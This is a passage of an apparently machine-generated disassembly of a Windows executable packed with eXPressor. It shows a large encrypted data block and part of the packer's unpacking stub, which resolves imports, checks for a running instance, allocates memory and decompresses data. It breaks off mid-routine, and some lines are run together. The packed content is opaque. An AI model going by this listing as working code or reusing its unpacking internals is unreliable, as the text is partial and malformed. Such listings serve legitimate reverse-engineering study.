dd 0E3D05974h, 283BD47Eh, 9FFBF597h, 0E81651BCh, 0C46C7D54h
dd 8BD8100Ah, 747B441Ch, 75A08DB3h, 80866050h, 0ADF7F425h
dd 2411177Ah, 752D2FB6h, 5B1E3CF6h, 0A34987A1h, 3DCF2C11h
dd 0F78E2A65h, 64E5FC78h, 69AC7409h, 93A9A329h, 6D58CD8h
dd 2CA12B44h, 0A7C7F59Fh, 0B3240A30h, 0A0098D5Fh, 65F8875Ch
dd 0EA0C19DDh, 38FE3595h, 0CCFE0AE7h, 23424D3Bh, 8F24D8FFh
dd 0F5887A4Dh, 1D3B248Eh, 3FD838D7h, 951D5F75h, 21961D46h
dd 47DA0146h, 0D8D3EDD0h, 41CBFCE2h, 6AB5D8EBh, 0AA83871Ch
dd 5348C37h, 6ABBFE40h, 76AC05B9h, 44800D70h, 0DBEA5F57h
dd 0BE7D2246h, 0F4B0E2D5h, 9349D1E4h, 2344FB98h, 14B8F372h
dd 0D0C53AEEh, 8656CA9Fh, 66D7E75Ah, 0B9F1FE9Dh, 954CCEBFh
dd 0EF7447EFh, 0FD66A6F4h, 98EF3399h, 0DF3C0B6Bh, 93C9414Bh
dd 7CCB37D8h, 6FF29843h, 0B0F11960h, 158F7540h, 7F46EA33h
dd 0B5DAAF8Dh, 794C64F0h, 0BEB61745h, 612EA144h, 280EA379h
dd 983D8171h, 5F57689Dh, 0FA7EBB39h, 0ED5A5605h, 8E52313Dh
dd 6BFB37EFh, 1388BE1Bh, 0CFACFA2Ch, 0CA73A16Ah, 0BA20253Dh
dd 9E29BB63h, 0B380F62Ah, 873AB04Bh, 0D8D8F3FCh, 28FBE198h
dd 57CAF3DBh, 0AD6D9875h, 5F227B2h, 0EED8B2F6h, 0CA447491h
dd 5D732E04h, 3860BFFBh, 32768F84h, 6AF5EBB4h, 0EBA35BA6h
dd 0CCE78335h, 7F61CA7Fh, 38300A07h, 0E42EB287h, 0A2C7A1B9h
dd 0C2E98818h, 607FDE47h, 0FE2B926h, 2237DE3h, 2C260BFEh
dd 0EBE7C37Eh, 0FF6C2E1Fh, 22C1557Bh, 3A0FE18Ch, 86D3E096h
dd 3BEB01D6h, 4694D9CEh, 4D6DDDA8h, 58729EE9h, 93F9A92Eh
dd 3A65AF7Ch, 0F4BECDE0h, 0DFC8FA7Bh, 0AEC93191h, 170D5200h
dd 194D7D48h, 79C4B49Bh, 0D90ECCE5h, 0F1D2EC5Dh, 16A67192h
dd 0CCE81042h, 0C7DB7F9Ah, 0E4D17ACBh, 68533CF7h, 0DD86B4E2h
dd 722A4CCDh, 683D0374h, 83393D56h, 0A7950249h, 5692D6F6h
dd 716A3D9Fh, 4D39A30Ah, 43CF16D1h, 87358B56h, 584EF987h
dd 0A7E47DEh, 84DFB90Eh, 46B7C21Ah, 308031CAh, 3F10C7CFh
dd 3A94DD99h, 0F0B95FD5h, 0C9288ACEh, 2EC2E24h, 0B9CBE16h
dd 12C9CB28h, 0EB404B80h, 27784703h, 0B8B7AA93h, 8E1F2288h
dd 1EBECF46h, 944E5D02h, 79D75686h, 0B7E5F724h, 0CE876EA4h
dd 0B1509078h, 0C3CEB659h, 829B567Ah, 477C8B8Dh, 0E67735D8h
dd 0E7B3F9F2h, 358430Ah, 26A09E4Bh, 80145A3Fh, 0CD167500h
dd 0C366357Dh, 5F48FCACh, 4E7CD999h, 655F8C60h, 0B66CEC3Fh
dd 0F9A7029Bh, 8F431B09h, 0AB4CEFDCh, 6A359212h, 0A05A9D23h
dd 0BB44D4C5h, 0E3914928h, 0A59EC0D3h, 29D43F62h, 5A9D67A9h
dd 4E5D1359h, 3B677497h, 0BA7182E7h, 0FADCABC2h, 7C898FEAh
dd 8EFFD0A1h, 0D85FD994h, 7074E0A9h, 4C19522Bh, 0D079FDB2h
dd 879D3224h, 0CC16F4B3h, 20E5410Bh, 14EEF93Dh, 0E315706h
dd 8423F51Bh, 0F5CE0622h, 67FB58EFh, 83D11D84h, 6C2231D9h
dd 381D9724h, 95FA93B1h, 7052D135h, 64F86277h, 0A07F2269h
dd 82069DB4h, 4E4623BFh, 24200E26h, 2952BB9Fh, 0E496EFA5h
dd 0E25D9AE9h, 8AE9A4F6h, 535FFAA3h, 0B93573F1h, 0BFFC6A28h
dd 5BE323C8h, 0B92C189Dh, 0B2115B3Dh, 20692CEBh, 754E4811h
dd 0AFAC41A6h, 74F410C7h, 2C73728Ch, 0C8564323h, 2AF518D8h
dd 1160F3C3h, 8DA71F93h, 0ACC90D00h, 0D4A5D823h, 0E3EA76F3h
dd 0C3B0957h, 0E0057B1Ch, 0CFEFB37Fh, 2179FE90h, 344E5338h
dd 0D5FAE96Eh, 894BC8F6h, 0DC3F1BCh, 0FA0F229Dh, 3B28C66Ch
dd 0E9A7F1D0h, 3AFBA305h, 1B089CDAh, 0A79FE4D6h, 0D1EFEC73h
dd 8302E2E5h, 4079E2E9h, 0FD2145EEh, 0F190955Ah, 0D320197Fh
dd 6A97125Eh, 72BB841Fh, 0A22068F9h, 6161AFBAh, 8CD2DEACh
dd 7E2C8249h, 4ED04FA8h, 36355D8Ah, 0EC393499h, 3826656Fh
dd 0AE48A3C9h, 57DD0ED3h, 0D8477A55h, 482694F5h, 0E8B34C0Ah
dd 53451E14h, 749DA199h, 429055A3h, 0CDA9B7CDh, 97628C81h
dd 99F2F772h, 95C908DFh, 0AAD6ECC7h, 64DA218h, 0F21A37DDh
dd 715D97C2h, 0C9836ABFh, 14A485CDh, 3BC18716h, 935E3A52h
dd 83D3C078h, 5763362Fh, 0A99B9D16h, 0BE689993h, 1BF7EDC4h
dd 2DA8EEF7h, 7526D859h, 4076654Ah, 0D599E123h, 5E65C6FEh
dd 0F4C3C66Bh, 5CC9D27Eh, 0ABD4D5F4h, 6BC2BD5Ah, 9D43EB80h
dd 0C1EB66BAh, 0A28ACD9Ch, 5E84A718h, 0F72DB352h, 0C6412B8Fh
dd 19E4BB35h, 6FF86F37h, 795DBA4Bh, 31EC7999h, 0AA4A4A2Eh
dd 0D9786857h, 0F7CEBDF5h, 0A1866014h, 63BE9DA1h, 19348C41h
dd 0D0BEF282h, 0D4CC8597h, 0FAD8B6D6h, 0B5DDA9EAh, 3ACAE9A6h
dd 9E61463Ch, 0BD1A911Dh, 0AC34DD3h, 22D8A296h, 0E9D835B0h
dd 92E3BD5Eh, 0A25616BEh, 0A05CD921h, 0FC638DDBh, 0BC1234F2h
dd 97357E6Dh, 4A4A5561h, 0B42C6663h, 0DC700E6Bh, 3E03788Fh
dd 627FF9A3h, 5D7F15Bh, 0F3A50986h, 0BA6BCBC5h, 889D05DFh
dd 9402452Eh, 0E67EE012h, 465F44E0h, 8EADCCF3h, 285C69E5h
dd 0B8E4E66Ah, 0A0730330h, 2C8C06DCh, 5615D80Fh, 7BC73CEDh
dd 19790C11h, 4C4B11BDh, 0C5F47AD9h, 0F3411F7h, 0F7D54C0Eh
dd 9C3D6342h, 3C6930BFh, 13FAB456h, 0EB980A34h, 62DC6E85h
dd 1FFCB59Bh, 4404C90h, 0AD6D75B9h, 0AB9268BCh, 0BAFA9B7Fh
dd 2AAC7A53h, 0B0EBA054h, 0F4B914D3h, 0E1B01CDEh, 4BC46D4Ch
dd 28FC02DFh, 2928A67Ah, 3B93C04Eh, 24672258h, 56CD9940h
dd 10D47FA8h, 0A27796FAh, 0FB87338Fh, 3E9C3E97h, 515BC867h
dd 0A9E96106h, 0A4DE3302h, 39B39547h, 0A7DF31A1h, 78C84C48h
dd 0FB26F022h, 8750B62Ah, 0F9754191h, 0BF5656B6h, 52970628h
dd 867AC9CDh, 71D11CE2h, 80B2AA15h, 3E914CEh, 66999904h
dd 16626587h, 33BE7B70h, 9A772DDFh, 0A9730933h, 0B84E3B98h
dd 4004E42Ah, 0AFAFDC04h
dd 504639DFh, 0BCAF28FAh, 6B864C47h, 0C231F1DEh, 45A77361h
dd 400867F1h, 43D29399h, 8B6480h, 5E0388A3h, 0A679571h
dd 66248411h, 5E77BC91h, 37629366h, 42BEEB7Eh, 3510548Ah
dd 0C2728506h, 0AC1F6379h, 139880CAh, 0D2AFADB2h, 295D08C9h
dd 0D8F2791h, 9E1AAD82h, 3566C84Eh, 0EE32D172h, 9508A504h
dd 571B1D97h, 537DCB5Ah, 0D8681069h, 0B6430ACAh, 0B8C8EC0Eh
dd 2739EA94h, 1244398Fh, 99E25691h, 4BB0E7BFh, 5262E99Ch
dd 99847015h, 1DA9FBBAh, 59630D2Ch, 0D26B5253h, 1C1C165h
dd 0B57EEA11h, 0B1C67ED7h, 0C21D0533h, 62EAB8E8h, 48A4D8FDh
dd 0DE06ECE0h, 0D36405B7h, 13A4A687h, 0DB2A5E2Dh, 43F1D12Bh
dd 0C485CF08h, 0D33E7506h, 3F42ECA0h, 4039FB91h, 56B4E2C5h
dd 0DA9EAE2h, 0F1B6C3FBh, 0C815C72Dh, 2C416850h, 0E36BA41Fh
dd 2BEA5509h, 6825E6AFh, 649F58F4h, 0A70725F3h, 2D0E7D47h
dd 646337CEh, 655E0DB9h, 6847DF3Fh, 33448FE4h, 0BEE93140h
dd 533DAB93h, 0F7B0CF60h, 0F7F45A23h, 0DB19A88Ch, 67B13353h
dd 0E86BF340h, 8EB2878Fh, 136B720Bh, 0FDEFFA40h, 38EA28FDh
dd 498B68D8h, 0AC892EF5h, 0CE2C0FCDh, 9EF67DF1h, 0BAEA3D78h
dd 0C72342Eh, 0C2ABC782h, 0DE11AFF2h, 83DBB7Fh, 80818212h
dd 53DBC4E8h, 1C592B6Eh, 2ADFF708h, 5E05FBB8h, 0B2259B66h
dd 0E4A718A4h, 0ADE8447Ah, 7C192E7Eh, 7B0EC93Dh, 0A69847B7h
dd 1F679508h, 5A4A66AAh, 6AA72432h, 3FC5D666h, 5FFFC65Dh
dd 0FD3A240Eh, 1051DFA2h, 0F3E7D187h, 6716F106h, 86CA3E8Fh
dd 6EBD6EB5h, 70A21303h, 5C2A939Fh, 0AED82695h, 0CA623B17h
dd 0B55D6039h, 0A809E21Dh, 43EF7DA9h, 0DA2BD4F5h, 6BF0E70Eh
dd 0CEDD30C9h, 5EA0E03Eh, 0F6606EBh, 6F3F042Ch, 0AD34B5A4h
dd 4F3DF847h, 6EB296CCh, 7274CA52h, 0E8291476h, 2C96DADBh
dd 0CBADF913h, 2894B265h, 40DB6BE8h, 3F098B15h, 0C32A75Ch
dd 0E90228A4h, 81F10278h, 0F29C0439h, 2A3780B3h, 1EBF7F08h
dd 9E40C442h, 0CEE0945Ch, 41D7964h, 0A630A767h, 441E90A7h
dd 3CCC12AEh, 1D16115Dh, 0FF4A094Ch, 0F80761D7h, 0A7C72B59h
dd 3E5D31AFh, 177BF632h, 4328EF3Ah, 3DBECFF5h, 5FCFB899h
dd 6A4CD560h, 7A86DB29h, 4CCA489Fh, 0C2455785h, 0FD0E57A0h
dd 0AD322004h, 933FAE5Bh, 7B8BA27Fh, 8EC6152Eh, 314F64C3h
dd 9A501A4Fh, 0B00BBA1Bh, 7EDB5539h, 6D70CBC8h, 0EB695578h
dd 0FFB933BCh, 0F50DD5BFh, 1649CB55h, 39F06D18h, 3E560C01h
dd 0B90EC949h, 0A095B551h, 0FD380AFCh, 3124B31Eh, 0C587F8E6h
dd 47FEEE66h, 681BC8A7h, 0FBCB8840h, 0EA60DF44h, 9FA2BC6Ah
dd 47E24954h, 245EFA92h, 51EC1753h, 0F6210415h, 5EC8FE15h
dd 74E59DFEh, 0D6C53230h, 71AA75Bh, 0E3DF8EF9h, 34005859h
dd 0FC2B4FC6h, 0C0C5BEF7h, 0CD02F25Eh, 878538CAh, 0BB617F42h
dd 0FEA47C7Fh, 2CABE8BDh, 8E684805h, 692319B6h, 9F89CAA6h
dd 24DF57C1h, 0BF2260F4h, 6CAF8908h, 0C95836A2h, 97DDBED3h
dd 5DBDC6F1h, 1D378DE2h, 14BEC5B5h, 0E72CD393h, 761EC000h
dd 1149028h, 0A309B8F0h, 7B593F18h, 98B3639Bh, 1FE76797h
dd 0F68C8121h, 97ACAA1Ch, 13DAEBA1h, 0A99F396Dh, 71FF4F5h
dd 9EE23AB4h, 0E041152h, 62B1F7B4h, 6906183Ch, 0CC757EBCh
dd 0BDC176F8h, 0D7EE69F5h, 0FD96EA3Ch, 8AA59EBEh, 0C2BC7DEEh
dd 82E7C1C1h, 251E6194h, 1DA677A4h, 366D491Dh, 0C92D60D5h
dd 0CFC61D43h, 0EDA6BA59h, 2BD0FE82h, 0F3D39913h, 0A09004E9h
dd 0E1DE281Fh, 8C2296F3h, 0CD760AB2h, 68E4C61Eh, 5A8448EBh
dd 9C480551h, 55850AF0h, 8420ED21h, 0D25485DEh, 2FBE3B66h
dd 9081D751h, 0B2DCC163h, 3852F702h, 169497BBh, 0E05D036Ah
dd 0D43470E8h, 0FF833405h, 25DD9E1Eh, 0C2AA6CE4h, 0C284BD05h
dd 0BAFB26B8h, 7631B2Eh, 8CA1C469h, 62830DB9h, 0AB3A35Fh
dd 0F57A72DCh, 0D8200CE8h, 73E83CF6h, 500C23B3h, 84D1F840h
dd 6E00BF4Fh, 93964E08h, 65437D68h, 7DCA1AEFh, 0E068A79Fh
dd 0B55FCA19h, 2EB2600Ch, 0B9816F9Fh, 0FEA5EE2Ch, 2D6AB843h
dd 6813E94Ch, 2988070h, 0DFB680ECh, 4FA9BB1Bh, 0FE358975h
db 6Dh, 0D1h, 12h
_pdata ends
; Section 3. (virtual address 00121000)
; Virtual size : 0000217D ( 8573.)
; Section size in file : 0000217D ( 8573.)
; Offset to raw data for section: 00121000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_ex_cod segment para public 'CODE' use32
assume cs:_ex_cod
;org 521000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_521000 dd 208Dh ; start+27�o
dd offset sub_522195
dd 0
dword_52100C dd 0FFFFFFFFh ; sub_5221F7+1B�r ...
dword_521010 dd 0 ; sub_5221F7+87�w
dword_521014 dd 0 ; sub_5221F7:loc_522277�r
dword_521018 dd 0 ; sub_5221F7+9F�r
dword_52101C dd 0 ; sub_5221F7+99�r
dword_521020 dd 0 ; sub_5221F7+93�r
off_521024 dd offset byte_52308D ; DATA XREF: sub_5214DB�r start+2C�w ...
dword_521028 dd 400000h ; start:loc_5216D0�r ...
dword_52102C dd 0 ; start:loc_52157E�w
dword_521030 dd 0 ; start+A92�r ...
dword_521034 dd 0 dword_521038 dd 0 dword_52103C dd 404FC6h dword_521040 dd 0 align 8
aExpressor_inst db 'eXPressor_InstanceChecker_',0 ; DATA XREF: sub_5222A3+F�o
align 8
dword_521068 dd 65074F7Fh, 304E63C0h, 17D50AAFh, 8D4ACB41hdword_521078 dd 5F696DCh, 36632B29h, 38C48BADh, 13A7F29ChaWks: ; DATA XREF: sub_522AD4+164�o
unicode 0, <wks>,0
db 0CCh
db 10h, 12h, 0
dd 2 dup(0)
dd 121216h, 12110Ch, 121100h, 2 dup(0)
dd 12123Eh, 121140h, 5 dup(0)
dd 12114Ch, 12115Ah, 12116Ah, 121178h, 12118Ah, 12119Ch
dd 1211B0h, 1211C2h, 1211D8h, 1211E6h, 1211F6h, 121206h
dd 0
dd 121224h, 121230h, 0
dword_52110C dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_521110 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_521114 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_521118 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_52111C dd 7C801D4Fh ; resolved to->KERNEL32.LoadLibraryExAdword_521120 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_521124 dd 7C801AD0h ; resolved to->KERNEL32.VirtualProtectdword_521128 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_52112C dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_521130 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_521134 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_521138 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA align 10h
dword_521140 dd 7E41A8ADh ; resolved to->USER32.wsprintfAdword_521144 dd 7E45058Ah ; resolved to->USER32.MessageBoxA dd 0
dd 69560378h, 61757472h, 6572466Ch, 3750065h, 74726956h
dd 416C6175h, 636F6C6Ch, 0AF0000h, 74697845h, 636F7250h
dd 737365h, 65470198h, 6F725074h, 64644163h, 73736572h
dd 2490000h, 64616F4Ch, 7262694Ch, 45797261h, 4178h, 65470177h
dd 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6956037Bh, 61757472h
dd 6F72506Ch, 74636574h, 1750000h
aGetmodulefil_0 db 'GetModuleFileNameA',0
align 4
aQ db 'ï',0
aFreelibrary db 'FreeLibrary',0
dw 169h
aGetlasterror_0 db 'GetLastError',0
align 2
aZ db 'Z',0
aCreatemutexa db 'CreateMutexA',0
align 2
dw 248h
aLoadlibrarya db 'LoadLibraryA',0
align 2
aKernel32_dll_0 db 'KERNEL32.dll',0
align 4
dd 737702D5h, 6E697270h, 416674h, 654D01DEh, 67617373h
dd 786F4265h, 53550041h, 32335245h, 6C6C642Eh, 2 dup(0)
; ---------------------------------------------------------------------------
loc_521250: ; DATA XREF: sub_522AD4+159�o
and ah, [edi+2Fh]
retf
; ---------------------------------------------------------------------------
cmp ch, [ebx+409C11D2h]
add al, al
dec edi
mov ds:67233E0Ah, eax ; DATA XREF: sub_522AD4+15E�o
das
retf
; ---------------------------------------------------------------------------
dd 11D2AB3Ah, 0C000409Ch, 3E0AA34Fh
dd 8000005Eh, 9B240000h, 7B1EC788h, 6265A491h, 28185474h
; DATA XREF: sub_522F84+28�o
dd 2242D40Ch, 0AF54CF93h, 4EA84814h, 0BAC114D5h, 0DB1A757h
dd 8D24E6C9h, 0B7928A4h, 848CF17Bh, 86EAC22Fh, 5D28990Dh
dd 80C0EEE1h, 0AEF129F7h, 4FA5F30Ah, 0FCBE7B8h, 1CEF0961h
dd 0E9B09F8Ch, 0EDF43D33h, 0A082C25h, 0EE61A8EAh, 0F47913D9h
dd 0D1F11E9Dh, 0D6525326h, 0C8A658F1h, 1747B9DBh, 1E43B443h
dd 50A15185h, 0D1F8D352h, 4D9FA5C0h, 0E51440FAh, 0FC3A6B71h
dd 0C5F38CC8h, 16F0E55Ah, 9753E7FCh, 893ED8E3h, 0E2057989h
dd 1B304375h, 9281130Dh, 19C40465h, 0A7A84CFAh, 759CC9FAh
dd 0B9488E87h, 0E61A7127h, 4F704F3h, 588B9D8Ch, 0EC6D72C4h
dd 65A0D97Fh, 631AC4FFh, 8B5A7CF6h, 9EC0FF6Fh, 3282CD8Dh
dd 4E5E94F4h, 41A012B4h, 48BE65BEh, 809BCEBh, 16E32938h
dd 3C9F0194h, 0BE416162h, 6AEBDEF5h, 6821B0ACh, 627FA5Ch
dd 0C2731D8h, 0BFC2A130h, 3F81F444h, 3B0005A7h, 50078468h
dd 1444EBF2h, 0F51D6396h, 66A87710h, 0D05898EFh, 7B249F29h
dd 8947458Dh, 8EB5572Eh, 0B609F915h, 10320D2h, 0A9D0C9AAh
dd 4DDA7D9h, 0E4C0348Bh, 6C37AAA4h, 707FD510h, 910F44AFh
dd 0F0054A1Fh, 0BC0725FAh, 464305DBh, 0FF4B837Eh, 843557E8h
dd 667058A5h, 34390A38h, 611DA61h, 0A596E84Ch, 0F29DE836h
dd 2EB52A53h, 9AC22DDCh, 0B73E8F2Bh, 875FF08Eh, 5CC7FF73h
db 0F0h, 0AAh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_521402 proc near ; CODE XREF: start+271�p start+389�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov cl, [eax]
cmp cl, 0E1h
jnb short loc_521474
xor ebx, ebx
cmp cl, 2Dh
mov [ebp+var_4], ebx
jb short loc_521432
movzx eax, cl
push 2Dh
xor edx, edx
pop esi
div esi
mov [ebp+var_4], eax
loc_52142C: ; CODE XREF: sub_521402+2E�j
add cl, 0D3h
dec eax
jnz short loc_52142C
loc_521432: ; CODE XREF: sub_521402+1B�j
cmp cl, 9
jb short loc_521449
movzx eax, cl
push 9
xor edx, edx
pop esi
div esi
mov ebx, eax
loc_521443: ; CODE XREF: sub_521402+45�j
add cl, 0F7h
dec eax
jnz short loc_521443
loc_521449: ; CODE XREF: sub_521402+33�j
movzx esi, cl
mov eax, 300h
push 4
lea ecx, [esi+ebx]
push 1000h
shl eax, cl
lea edi, [eax+eax+0E6Ch]
push edi
push 0
call ds:dword_521110 ; VirtualAlloc
test eax, eax
mov [ebp+var_C], eax
jnz short loc_521479
loc_521474: ; CODE XREF: sub_521402+11�j
push 1
pop eax
jmp short loc_5214D6
; ---------------------------------------------------------------------------
loc_521479: ; CODE XREF: sub_521402+70�j
lea ecx, [ebp+var_8]
push ecx
mov ecx, [ebp+arg_4]
push 0FFFFFFFFh
add ecx, 0FFFFFFFBh
push [ebp+arg_8]
push ecx
mov ecx, [ebp+arg_0]
add ecx, 5
push ecx
push [ebp+var_4]
push ebx
push esi
push edi
push eax
call sub_52275F
add esp, 28h
mov esi, [ebp+var_8]
xor ebx, ebx
mov edi, eax
push 8000h
push ebx
push [ebp+var_C]
call ds:dword_52110C ; VirtualFree
lea eax, [ebp+var_10]
mov [ebp+var_14], ebx
push eax
lea eax, [ebp+var_14]
push eax
push ebx
push esi
mov [ebp+var_10], 0FFFFFFFBh
push [ebp+arg_8]
call sub_522352
add esp, 14h
mov eax, edi
loc_5214D6: ; CODE XREF: sub_521402+75�j
pop edi
pop esi
pop ebx
leave
retn
sub_521402 endp
; =============== S U B R O U T I N E =======================================
sub_5214DB proc near ; CODE XREF: start:loc_5215AF�p
mov ecx, ds:off_521024
mov eax, offset start
sub eax, [ecx+64h]
retn
sub_5214DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near ; DATA XREF: sub_5214DB+6�o
; sub_522195+18�o ...
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 274h
push ebx
push esi
push edi
and [ebp+var_238], 0
rep jmp short loc_52150C
; ---------------------------------------------------------------------------
dd 72505865h, 312E762Dh, 2E362Eh
; ---------------------------------------------------------------------------
loc_52150C: ; CODE XREF: start+13�j
mov eax, ds:dword_521000
add eax, offset dword_521000
mov ds:off_521024, eax
mov eax, ds:off_521024
mov eax, [eax+4]
and eax, 80000000h
test eax, eax
jz short loc_521588
cmp [ebp+arg_4], 1
jnz short loc_52155C
mov eax, [ebp+arg_0]
mov ds:dword_521034, eax
cmp ds:dword_521040, 0
jnz short loc_52155C
push 4
push 1000h
push 320h
push 0
call ds:dword_521110 ; VirtualAlloc
mov ds:dword_521040, eax
loc_52155C: ; CODE XREF: start+46�j start+57�j
cmp [ebp+arg_4], 0
jnz short loc_521570
cmp ds:dword_521038, 0
jz short loc_521570
jmp loc_522064
; ---------------------------------------------------------------------------
loc_521570: ; CODE XREF: start+76�j start+7F�j
cmp ds:dword_52102C, 0
jz short loc_52157E
jmp loc_521F39
; ---------------------------------------------------------------------------
loc_52157E: ; CODE XREF: start+8D�j
mov ds:dword_52102C, 1
loc_521588: ; CODE XREF: start+40�j
mov eax, ds:off_521024
cmp dword ptr [eax+60h], 0
jnz short loc_5215AF
push 10h
push 0
call sub_522F84
pop ecx
push eax
push 1
call sub_522F84
pop ecx
push eax
push 0
call ds:dword_521144 ; MessageBoxA
loc_5215AF: ; CODE XREF: start+A7�j
call sub_5214DB
mov ds:dword_521028, eax
push 4
push 1000h
push 80h
push 0
call ds:dword_521110 ; VirtualAlloc
mov [ebp+var_218], eax
push 104h
lea eax, [ebp+var_210]
push eax
push ds:dword_521034
call ds:dword_521128 ; GetModuleFileNameA
lea eax, [ebp+eax+var_211]
mov [ebp+var_22C], eax
loc_5215F8: ; CODE XREF: start+129�j
mov eax, [ebp+var_22C]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jz short loc_521615
mov eax, [ebp+var_22C]
dec eax
mov [ebp+var_22C], eax
jmp short loc_5215F8
; ---------------------------------------------------------------------------
loc_521615: ; CODE XREF: start+11A�j
mov eax, [ebp+var_22C]
inc eax
mov [ebp+var_22C], eax
mov eax, [ebp+var_22C]
lea ecx, [ebp+var_210]
sub eax, ecx
mov [ebp+var_254], eax
mov ecx, [ebp+var_254]
lea esi, [ebp+var_210]
lea edi, [ebp+var_104]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_254]
and [ebp+eax+var_103], 0
and [ebp+var_228], 0
mov eax, ds:off_521024
mov eax, [eax+4]
and eax, 4000000h
test eax, eax
jnz short loc_52168D
mov eax, ds:off_521024
mov eax, [eax+4]
and eax, 2000000h
test eax, eax
jz short loc_5216D0
loc_52168D: ; CODE XREF: start+190�j
call sub_5222A3
mov [ebp+var_228], eax
mov eax, ds:off_521024
mov eax, [eax+4]
and eax, 4000000h
test eax, eax
jz short loc_5216D0
cmp [ebp+var_228], 0
jz short loc_5216D0
push 10h
push [ebp+var_22C]
push 18h
call sub_522F84
pop ecx
push eax
push 0
call ds:dword_521144 ; MessageBoxA
jmp loc_52205F
; ---------------------------------------------------------------------------
loc_5216D0: ; CODE XREF: start+1A1�j start+1BD�j ...
mov eax, ds:dword_521028
mov [ebp+var_250], eax
mov eax, [ebp+var_250]
mov ecx, ds:dword_521028
add ecx, [eax+3Ch]
mov [ebp+var_230], ecx
mov eax, ds:off_521024
cmp dword ptr [eax+84h], 0
jz loc_5217C3
mov eax, ds:off_521024
mov ecx, ds:dword_521028
add ecx, [eax+9Ch]
mov [ebp+var_240], ecx
mov eax, [ebp+var_240]
mov [ebp+var_248], eax
mov eax, ds:off_521024
mov eax, [eax+50h]
mov [ebp+var_234], eax
mov eax, ds:off_521024
mov ecx, ds:dword_521028
add ecx, [eax+58h]
mov [ebp+var_21C], ecx
push [ebp+var_240]
mov eax, ds:off_521024
push dword ptr [eax+4Ch]
push [ebp+var_21C]
call sub_521402
add esp, 0Ch
mov eax, ds:off_521024
push dword ptr [eax+88h]
push [ebp+var_248]
call sub_522AD4
pop ecx
pop ecx
mov [ebp+var_238], eax
cmp [ebp+var_238], 0
jge short loc_5217BE
push [ebp+var_238]
push 2
call sub_522F84
pop ecx
push eax
push [ebp+var_218]
call ds:dword_521140 ; wsprintfA
add esp, 0Ch
push 30h
push [ebp+var_22C]
push [ebp+var_218]
push 0
call ds:dword_521144 ; MessageBoxA
loc_5217BE: ; CODE XREF: start+29E�j
jmp loc_52205A
; ---------------------------------------------------------------------------
loc_5217C3: ; CODE XREF: start+212�j
mov eax, ds:off_521024
cmp dword ptr [eax+80h], 0
jz loc_521988
push 4
push 1000h
mov eax, ds:off_521024
push dword ptr [eax+4Ch]
push 0
call ds:dword_521110 ; VirtualAlloc
mov [ebp+var_248], eax
mov eax, [ebp+var_248]
mov [ebp+var_240], eax
cmp [ebp+var_240], 0
jnz short loc_521825
push 30h
push [ebp+var_22C]
push 3
call sub_522F84
pop ecx
push eax
push 0
call ds:dword_521144 ; MessageBoxA
jmp loc_522055
; ---------------------------------------------------------------------------
loc_521825: ; CODE XREF: start+31B�j
mov eax, ds:off_521024
mov eax, [eax+50h]
mov [ebp+var_234], eax
mov eax, ds:off_521024
mov ecx, ds:dword_521028
add ecx, [eax+58h]
mov eax, ds:off_521024
mov esi, [ebp+var_230]
mov eax, [eax+94h]
xor edx, edx
div dword ptr [esi+3Ch]
add ecx, edx
mov [ebp+var_21C], ecx
push [ebp+var_240]
mov eax, ds:off_521024
push dword ptr [eax+4Ch]
push [ebp+var_21C]
call sub_521402
add esp, 0Ch
jmp short loc_52188A
; ---------------------------------------------------------------------------
loc_52187D: ; CODE XREF: start+481�j
mov eax, [ebp+var_238]
inc eax
mov [ebp+var_238], eax
loc_52188A: ; CODE XREF: start+391�j
mov eax, ds:off_521024
movzx eax, word ptr [eax+8Ch]
cmp [ebp+var_238], eax
jge loc_521970
cmp [ebp+var_228], 0
jz short loc_5218E7
mov eax, ds:off_521024
mov eax, [eax+4]
and eax, 2000000h
test eax, eax
jz short loc_5218E7
mov eax, [ebp+var_238]
imul eax, 18h
mov ecx, ds:off_521024
mov eax, [ecx+eax+0A4h]
and eax, 10000000h
test eax, eax
jz short loc_5218E7
mov [ebp+var_270], 1
jmp short loc_5218EE
; ---------------------------------------------------------------------------
loc_5218E7: ; CODE XREF: start+3BF�j start+3D0�j ...
